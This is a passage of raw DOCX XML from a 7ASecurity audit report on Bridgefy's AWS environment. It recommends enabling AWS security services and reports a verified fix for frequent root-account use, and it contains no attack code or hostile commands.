          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId205">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_settingup.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="35"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId206">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/blogs/mt/aws-config-best-practices/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Configuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Recorders:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Delivery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Channels:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Configuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Recorders:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Delivery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Channels:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="705" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement as many AWS Security related services as possible. This should include tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Security Hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Guard Duty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, Macie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Inspector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. After this, the infrastructure team should ensure that all relevant services, and equivalent products, are enabled for the whole environment in all used regions. Furthermore, any reported issues should be regularly reviewed and remediated. This should ideally be accomplished by leveraging an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>infrastructure-as-code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>approach such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Terraform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>142</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, which would significantly simplify applying the same settings across all AWS accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stopped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>daily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and started using personal accounts instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>frequently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts for actions that could be performed with more restricted accounts. AWS root accounts are the main and most privileged accounts in the AWS environment. Using a root account frequently, either via the API or interactively via the AWS Web Console, unnecessarily increases the likelihood of unauthorized access. In certain cases it also weakens the security policy, as commonly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access and is disabled for the API. It should be further noted that no documentation was identified relating to minimizing user privileges during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target) AWS Account 292595537002 (bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>illustrates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>days:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>activities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="8"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487619584">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>76140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="86" name="Graphic 86"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="86" name="Graphic 86"/>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5.995337pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15696896;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape71" coordorigin="1440,120" coordsize="2880,0" path="m1440,120l4320,120e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId207">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
